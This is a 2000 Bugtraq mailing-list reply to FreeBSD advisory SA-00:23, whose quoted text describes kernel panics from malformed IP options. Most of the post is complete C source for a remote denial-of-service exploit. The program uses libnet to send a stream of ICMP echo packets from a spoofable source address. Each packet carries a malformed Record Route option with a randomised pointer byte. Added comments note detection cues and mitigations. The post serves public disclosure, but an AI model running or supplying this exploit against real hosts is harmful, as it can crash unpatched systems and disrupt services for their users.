[15485] in bugtraq


Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options

daemon@ATHENA.MIT.EDU (yeti)
Mon Jun 26 16:31:29 2000

Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-Id:  <Pine.LNX.4.10.9901131941520.12717-100000@rast.lodz.pdi.net>
Date:         Wed, 13 Jan 1999 19:50:08 +0100
Reply-To: yeti <y3t1@RAST.LODZ.PDI.NET>
From: yeti <y3t1@RAST.LODZ.PDI.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <20000622215052.D642E37BF12@hub.freebsd.org>

#include <stdio.h>
#include <libnet.h>
/* Remote denial-of-service in IP stack
   simple exploit by y3t1
                     y3t1@rast.lodz.pdi.net

Gretzzz : rastlin,z33d,vanitas,DYZIU,Kuki,vx,zx,korie,kaneda,
          d3cker&mroowka,jarv33s,funkySh,Shadow,tmoggie
	  all from :
	           #hwa.hax0r.news@efnet
	           #darnet@efnet
*/
/*
 * Scale one rand() draw into a small positive integer.
 *
 * zakres ("range" in Polish) is the nominal upper bound; the result is
 * nominally in 1..zakres. The product is formed in single precision
 * before the division, so the upper bound is not strictly guaranteed
 * for draws very close to RAND_MAX.
 *
 * Uses the process-wide rand() state; the caller is expected to have
 * seeded it.
 */
int rand_n(u_long zakres)
{
  int offset = (int) ((float)zakres * rand() / (RAND_MAX + 1.0));

  return offset + 1;
}

/*
 * Proof-of-concept sender posted in reply to FreeBSD-SA-00:23.ip-options.
 *
 * Parses -s / -d / -p, builds a single ICMP echo request whose IP header
 * carries a 4-byte Record Route option, and writes that packet to a raw
 * socket `ile` times (default 100), rewriting one option byte per packet.
 *
 * Defender notes (all derived from the constants below):
 *   - The structural anomaly is the Record Route option itself: its length
 *     field is 3, which leaves no room for route data, while RFC 791 gives
 *     4 as the smallest legal pointer value. A filter or IDS rule should
 *     key on that inconsistency rather than on the fixed ids, which are
 *     only compile-time constants here.
 *   - The source address is taken from the command line, so the source IP
 *     of observed packets is not a trustworthy indicator.
 *   - Mitigation is the kernel fix referenced by the advisory; where IP
 *     options are not needed, dropping option-bearing packets at the
 *     network edge removes the exposure independently of patch state.
 */
int main(int argc, char **argv)
{
    /* NOTE(review): getopt() returns int; storing it in a plain char makes
       the comparison against EOF depend on the platform's char signedness. */
    char a;
    /* ile ("how many" in Polish) is the packet count. */
    int sock, c,pkt,ile;
    struct hostent *host;
    /* NOTE(review): src_ip / dst_ip are only assigned inside the -s / -d
       cases; the argc check below does not guarantee both were given. */
    u_long src_ip, dst_ip;
    u_char *buf;
    /* Zeroed 4-byte template for the IP option area. */
    u_char options[4];
    int option_s  = sizeof(options);
    struct ipoption ipopt;
    srand(time(NULL));
    ile=100;
    printf("  -= Remote denial-of-service in IP stack =- \n");
    printf("\n");
    printf("                          by y3t1/team140\n");
    printf("                             y3t1@rast.lodz.pdi.net \n");
    printf("\n");
    /* Print usage and stop when fewer than three extra arguments are present. */
    if  (argc < 4)
    {
     printf("%s -s src_addr -d dst_addr -p packets\n",argv[0]);
     printf(" -s src_addr - source address \n");
     printf(" -d dst_addr - dest address \n");
     printf(" -p packets - how many packets send to dest (default 100)\n");
     exit(1);
    }
   /* Suppress getopt's own error messages. */
   opterr=0;
   while((a=getopt(argc,argv,"s:d:p:"))!=EOF)
   {
	switch(a) {
	 /* Each address is resolved as a host name first and, failing that,
	    parsed as a dotted quad; the inet_addr() result is not checked. */
	 case 's': {
	           if ((host=gethostbyname(optarg))!=NULL)
		   bcopy(host->h_addr,&src_ip,host->h_length);
		   else src_ip=inet_addr(optarg);
		   break;
		   }
	 case 'd': {
	           if ((host=gethostbyname(optarg))!=NULL)
		   bcopy(host->h_addr,&dst_ip,host->h_length);
		   else dst_ip=inet_addr(optarg);
	      	   break;
                   }
         case 'p': {
	            /* atoi() gives no error indication for non-numeric input. */
	            ile=atoi(optarg);
		    break;
		   }
	 }
   }
    bzero(options,option_s);
    buf = malloc(IP_MAXPACKET);
    if (!buf)
    {
        perror("malloc");
        exit(-1);
    }
    /* Raw socket: the sender supplies the whole IP header, options included. */
    sock = libnet_open_raw_sock(IPPROTO_RAW);
    if (sock == -1)
    {
        perror("socket");
        exit(-1);
    }
    /* Fixed header for an ICMP packet. By libnet 1.0 argument order the
       constants read as IP id 242 and TTL 48 -- TODO confirm against the
       libnet version in use. */
    libnet_build_ip(LIBNET_ICMP_H ,0,242,0,48,IPPROTO_ICMP,src_ip,dst_ip,NULL,0,buf);
    /* Start from the zeroed template, then set the four option bytes:
       type = Record Route, length = 3, pointer = 0xff, trailing 0. */
    memcpy(ipopt.ipopt_list, options, option_s);
    *(ipopt.ipopt_list)     = IPOPT_RR;
    *(ipopt.ipopt_list+1)   = 3;
    *(ipopt.ipopt_list+2)   = 0xff;
    *(ipopt.ipopt_list+3)   = 0;
    /* Splice the 4 option bytes into the header already built in buf. */
    c = libnet_insert_ipo(&ipopt,option_s,buf);
    if (c == -1)
    {
        printf("Error\n");
	exit(1);
    }
    /* ICMP echo request placed after the IP header plus option; the
       constants appear to be id 242 and sequence 31337 -- TODO confirm. */
    libnet_build_icmp_echo(ICMP_ECHO,0,242,31337,NULL,0,buf+LIBNET_IP_H+option_s);
    /* A checksum failure is reported but does not stop the run. */
    if (libnet_do_checksum(buf,IPPROTO_ICMP,LIBNET_ICMP_ECHO_H)==-1)
    {
     printf("can't do checksum \n");
    }
 for (pkt=0;pkt<ile;pkt++)
 {
    /* Offset 22 is presumably the option's pointer byte (20-byte fixed
       header + 2) -- assumes LIBNET_IP_H is 20. It is overwritten with a
       fresh rand_n(0xff) value for every packet, so the pointer field
       varies on the wire while type and length stay constant. */
    buf[22]=rand_n(0xff);
    /* The write result is stored in c but never inspected. */
    c = libnet_write_ip(sock, buf, LIBNET_ICMP_ECHO_H + LIBNET_IP_H + option_s);
 }
    free(buf);
    libnet_close_raw_sock(sock);
}

On Thu, 22 Jun 2000, FreeBSD Security Advisories wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Topic:		Remote denial-of-service in IP stack
>
> Category:	core
> Module:	kernel
>
> There are several bugs in the processing of IP options in the FreeBSD
> IP stack, which fail to correctly bounds-check arguments and contain
> other coding errors leading to the possibility of data corruption and
> a kernel panic upon reception of certain invalid IP packets.
>
